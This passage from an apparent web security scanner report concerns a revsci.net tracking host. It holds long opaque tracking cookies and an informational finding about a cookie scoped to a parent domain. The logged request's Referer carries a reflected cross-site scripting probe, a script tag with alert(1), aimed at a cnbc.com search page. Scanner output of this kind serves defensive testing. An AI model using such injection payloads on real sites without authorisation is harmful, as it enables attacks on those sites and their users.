nXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_HIOU="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAMqTK+yvs0UNiAwl8R+cnLZYDAKPhp+YOsq7UHwThgQyPsjf9nPZuPqSJhCx0ltjkmipjVw1j+2QxI1g4jRqBraX7I4lUnu2sV/sixTduDjGnSlKXbMl+aYGHACU4PJlZ5Y0x4JtTIZuheQFNjNegsShCGdTIygRSS4Q7ne6VpuiNwHUPR7nG5tHRgfQqMqHDcmBdNQo+aPKOPUHK0sY74QJib5NlMs8YrdLFO1jACoTFMK8NNu54Cks2hfhjVCF/C17zV40hYcHeoLqnFjzLRtQKCLw/NjSFnX/CLedLZhbEvrw0iWGWqR9ZM6XvqfAT3iksoGeJAFSmfmu3tSHfCbA27vImR4qMHsglZCh+zhBLukh0IsU0x6BPADxOF4BjqLVwkfzqPSX5dHLFSQqVp1QMQDLNtQtVsPz4JF9/tFQ6+uV1j31nx7W4Qk81MGDVjgJPX9+TMW52l6EZLZ7yhhhgJ/OviIVsdRNUOkkQ7FfhhbCekmx24qJu1wWXzfENbmLUuSCeo81f01GKVzachQvMthF/T4WLakpopzNfQwizI3hzQvFrgvWMiDZlnIHqEftdLBNGFWs8dtVA2wby/9mctpVNe+njNn9aHtLl/MZewwU2zbFFb+rcYb7W75TY0VpUxMm8+wvaDr0z0bxzKvW4lxrO8xhDVKzW5pmrl/ksG/joLPsf3yZqEHBnEblapKY7O+1z5Xut19mwgd2WLy/j6xzjOt/m+oTA1sEccN+ndN18yv5747wtLC9tW77SsXFFqIISdYyLzukYqofRNGmsbtRp4MmrVUsy0ZwmprRBuw1A3I5c45ewrFrD0x3hirBnjYS+316rgtBAhZ/thiXbjMFYb0XjWXLprMJI0W3hxlTbM81de65jGCPfav75CYtj+MVQ/K3RsYEdPFu+q9sijgTXwESTAsMV7BlrvVJJvQWMA2zhUy3iW7kxenQHlp7UJ8Fhsthj1yqNWVFzgjuV2dgc+Hlh76ktKbR4ifiixorZYIeDrp5CjEF/zILHg8trg5iTl0jeVyLcIZREsharpFNHllgDWanPsW41GF7YiSt39jwIKPj+mTkoiz5tBE+UrBsqvk2bqNU6w0WjAG73qh6nE2dz64rQ3CGe9gZkkwZEQAsCavJQ4na/BRcDENWxBEVNRwHJKWTyVC3sS3frY2T+p57BGJViqehLgC2kF+3UBJeiX37wjwKgFmwejJfuSCUUpNaTXtg/vFUJGOzZr6kMeUSMf74ON1CI3b4/q2XrhDlP0kwk35vOIm4bn50I7eeiJ/opkdOQbRXCt58yIlc/f11Ufn14HauJ1OG6KwUajG1sg="; rsi_us_1000000="pUM14ymnMBYY7dXKYa4+QBq0gySw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIfwANFyTJil583WtzAhzzNfE+pD3lAuHGHVp514nWGQnCu6brt5PUxGRUlQamUvZIBZOhHhqaWIknb5L5bfPjNdHiOI3+L71fEzWoRn+y4+5eRBTByQ7gkvqh/99HNVJg0Mhx7jT93632OtMFe7ldendZZd8NDEWPbpffS+GCpH6QqL2hsceChO/XL4EGbINZF9Qi2qEn7l9OZaOmvg0qDTl+Y3fcKZnj7j4ZgFNBzxjmibF2GJbKtRn0KC35m5ml4Z5LApFxb/CiPL7JUl48ouIu7qWXjHBJeyxrMgxdOisTldj3/E2OpD+rwDxm9OZaG2T/zFtCloP6m0ZukU3G+1275N/HSX1I8L/b1JRdufb7yEj0PWuyHmTy5ELQQkOVjAaaOF2cXaIyQ/PwUXcdq4d7o22XeQxkVHmdYIr3tH092wXrqVICF6LzxpwGsmT/WvH/a3vASqFEOUT52i2tfn6fncA3Lnf3DDNMmYX+MeEf0Og5DcItZXD61CdeBCI2cjGBrJTBJyT3nreFca+VR5Z3HjjKhWFLqVYSbsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3fvrkNw9CNiVcGJUkIlGc1WvKXDXnga6xk9e0i4q8tMzUn4T+rbQ83v/SYy/xbh8sP0ximayS9XZWO5+CluJkUk85bZMbCuB+Ik/KbBF4aqZQ4ZvHoJq4zTxglm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xSMiEJwAP2Y98pc7DHfosuzCREAzM3TYioHSfNZFpQLwpvqLLAHKFDUakZ3P93Zp7WEmE9V6tD6Pup8UJryE1CORWQiB9Rst+H4Ve8ib/zR3GE7riSAwx/nmNBX+TympwelaDVPoCe5vP/0UpciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3JJ3a7QQ2+ItWxXxOvADytVwDRCaETLlfSXZRF8MTvb5toU0JrcfZK1avEeIy22iiKkgzYJ83IX1u99j0PmDe5IcWhX/WJm+tmxN/jF1vtCGUkz7Ai8vI5sbEVScmLZpP79tRKj7KRRbHt5bmt3pD9paJ/NU9dcGdrTUaDb6l1J5kXlaDa2xqyd4PhGmVI4Qe2yrYj5OmAE4p1Jo1NGDYAjOJ0JkgrWadPfLrdRbEmmovfb8FDkX5cYklENMj8NXYgL+a8bEDqHJfsKvamEvP7t7VkdnDkFOoyET7+JpbrRHk9msl09UtXT0O2laq7+git06IJ6Zj2lTGE3P5BjBAOAYNoyFhyjb4g5rGv0KC/6nOmFnflH6QXTLRmiJ7QKRgHNfyaj79uFBvvx0UzdFwa0s2juTD+nN8bMLwALPOnf/OUbyhDiHIa0Z40kEU+shFWFPkeNT7bS6lg54LBLPFDhXAVOvomNpZtrEDXtqzrjZjfH7/c+sORpvXtCCHMPaIsLI9Yu7kQP4fofcltHXsXirk7/ccp/33AJhksi2p5OkclUNVs30C1J0Nwht5R2VpvFRnSVwcye4R+Lj3PD+Nyp+CGdw3TVfuB0OogwXbdNCxubJLLt+BiSkqoEj2KXP60sXIWmV3fZmxUhJEhZWkmGTnM593CDzU6/gDvdGBJJdc5fqQIhd/Ge1vh1xWmhYzo1fdkwzoQFhx0WqR00KV6rH8009/7sxUxkud964S1crRQvocbmTaKIu79XZHJIAeASToF6zU="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7U1qHNUdlHLPM5AqF7BNa0rYva3VSjnoPTgs1pTjmZZ050Ga+FNTpuG/4QhslaKrq+YD7BDN/dv+1Zpeg/u+e8/TqC+uIDKhW6K0+CkGA7hBgcMP3THN4Ih2cqt0/0SlTxuIdxjE/vagXj273yLQtFocuMgvhXM+gRZosHNtbBnyI9Peu8qnqhDPHuJyDV5PKGo2x/wdWBJgTm7BeZ69/2StK9XhQ1rD39JitVpEHxH/U/nxw+K0euFsiQbwAZpCdMOuAlxHJ46nSAf83QrmsW7t7oKrMloC36HPa7foOp3pWUSfrwfWPtRHhAzla0GYq2ET5UVu59AlzK6KOWnK/vEK/SXdvfT4NN8=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKkIGSNrjQ0ubO+9Micc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVTIYQ62RMPFHPf1Uqh8hkiOCKE0bhWe4kKQnkl16tq9preAxHphFoGataiCY4MsktlzVfsKejSNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0VdxUYxuojQ2BuD0f+WbEpIzndJG/fogQhMe7wsnGx0ZUA1LRvIqc1ZCRGQnqo6lbb+SRPPRh/aj5ttCTYTqJZoUmIGRGDibHTk5RafHTptYvn794Rs5a/AWZGNMU4OCXav6JqC5f8352w1VO+fHAsHBzN5QM+rXeCDcD+XndQ7mVjybMVz3Xhpkr82fBvQR7L6J9TP2yJB5UGVSHaB0iP0UXysGpt8BQZJKrAXqWNdC8j5RJRevXcnOdwvsBDYngTpLHnpZcnpGu0GwY+oVizJVL3FAOJ32n+jFrveJjzca4RlI0UQepclJQX98N04vrgQEdHsQ6njPT1lzdhOVSJXxNN+bF+NI8ER6MvpozFNuNYmb09NhBEtrJKtc9WLdXNDoRYU8JuCrcaBttPw/VxiLOLeaQZKi3jv7+7jd5kgqeLc4hFM5jxgEd64JthvvboB1bYjhQ; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:46:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:46:59 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.134. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/210088310.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vKDhf8x1zrSc6gCzrFbMIKhTTdRqoKlX/oPK//kr2kQXuR24z1Xd5Epy8Nuvh2Xbn/ZbdhDQ6jgMBVM4H5qcXSe48t8PK3WeogQhMe7wl3Gx0bUAFLRvIqc1ZCBGcncieS3sVyrE1RLjHPZUTwqJcfs27xK6WCdqQtvWy5/QZdujY05tSt9al9cxR7yLPnpwCECgSh9J3f2PSBV1F1ilMlUM/FYb2bAgdxDGVq4QKVO4SoRayrPmoaXCy+laCBm0IwcCpvZlzQmWS1JV3pld1LbO5129EmYa/TvHtTvUl6kLt48oxwSV2ajuj8clTHkylvMsWS37WmwspyTGknX1DQ0JeGvplrq7PJXM6cfBurV73XhiwlAQJRtqQQSYuSOCeSV93O9SWUbhRILfD6xrK3er59aKKo8MZRX9RNg0UPsgisu/EFFJZVo7seFL8MD3Mm3U5eTo8V9KBPj6dHnvLPv5CC7ocsFSGS7hR7hVk2HtO5Er19800fKgv7vAVmWfvKBAz/SaQg8ySDMxIHoQqQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:05:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/210088310.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F3%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsi_segs_1000000=pUPF5E2h+nIMpjaBv3Dh/hL8rsB4rOfq5QsJKQ25YyViGymJW18v6kTo+UWdpq+vTM8FxQDLWDq/Kj3R8NpRH3TAhKfM4dAhtwwWcHMqGKkKtfxno3sGJPu8Z7ElYRvWdL9tFSMAV/7PzSKU/Vwc9SlHYx9KGGe5X1ejsUBFG4UM5yIGrLKXJEJqbjRJy9w5bfXe8mAj+VXUGcosCzLh4HW1pafBXtDa3eKAgMTkYou6yEN+SsZEbZPLJwe7Oqdyv3mTV2Ql0CTpLbHuCRUHqKu11AP28dM7jTbrYeaOiPTsAziE1XrijvsOctW1a3OSkQOBq63Wgosu2alW5rhQgIGOBeezLtGweG9d5XcmqgfNRMjUFlBFIg3ouxoKMZ3FqzkjdCkhSDAOyJDvyswAJz4NiuqbUb3RFvoCo1Y4OwYNCzDz+6d/tRXi/PdGHdoMRCazY1hY9UKPXOmc6QyrCAKxmz+CJqBqUzMUH3MjIBVv5r0VmUzdZzeeGeLhUGq1qYcdOtvc7PbSQ9uKHmvfXKSJqSmdNUnbTT+Zxij8PS8W8HXAX42sD2e6cR4appoTB/KjYP/i9wzPC2I66KY5dO4qrcz0UQgMNqJhsQR1GoCjHuv3rhWhNrTD1AuNarUYOePHF4+5cb+mBgosVBHM9buGNYJnpUo8hZ2HCQ==; 